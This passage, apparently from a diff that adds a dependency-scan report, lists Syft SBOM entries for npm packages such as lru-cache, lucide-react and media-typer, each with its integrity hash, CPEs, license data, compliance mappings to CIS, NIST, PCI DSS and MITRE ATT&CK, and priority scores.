"control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8bf9ffa72cfbe889", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lru-cache 10.4.3", + "title": "lru-cache 10.4.3", + "description": "Package discovered: lru-cache 10.4.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d68cb2f643232396", + "name": "lru-cache", + "version": "10.4.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/lru-cache@10.4.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", + "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a08719993444a9bd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lru-cache 6.0.0", + "title": "lru-cache 6.0.0", + "description": "Package discovered: lru-cache 6.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3a3d54b6437f39f3", + "name": "lru-cache", + "version": "6.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/lru-cache@6.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fb9befbc81581725", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lru-memoizer 2.3.0", + "title": "lru-memoizer 2.3.0", + "description": "Package discovered: lru-memoizer 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "adf63f866928cf12", + "name": "lru-memoizer", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lru-memoizer@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz", + "integrity": "sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug==", + "dependencies": { + "lodash.clonedeep": "^4.5.0", + "lru-cache": "6.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "03f163b26dd00375", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: lucide-react 0.376.0", + "title": "lucide-react 0.376.0", + "description": "Package discovered: lucide-react 0.376.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9a372e50af0fe0ae", + "name": "lucide-react", + "version": "0.376.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/lucide-react@0.376.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz", + "integrity": "sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0f65ff516206127f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: math-intrinsics 1.1.0", + "title": "math-intrinsics 1.1.0", + "description": "Package discovered: math-intrinsics 1.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "87a83232f7674dbc", + "name": "math-intrinsics", + "version": "1.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/math-intrinsics@1.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9efbed3ea63ec0cc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: media-engine 1.0.3", + "title": "media-engine 1.0.3", + "description": "Package discovered: media-engine 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "1dbf081258d17462", + "name": "media-engine", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/media-engine@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz", + "integrity": "sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6ecc4376357a6aa5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: media-typer 0.3.0", + "title": "media-typer 0.3.0", + "description": "Package discovered: media-typer 0.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d88fe6586764efc9", + "name": "media-typer", + "version": "0.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/media-typer@0.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "integrity": "sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d32acd7a2e9bf402", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: merge-descriptors 1.0.3", + "title": "merge-descriptors 1.0.3", + "description": "Package discovered: merge-descriptors 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "670d71ff9d8ed75e", + "name": "merge-descriptors", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/merge-descriptors@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz", + "integrity": "sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by 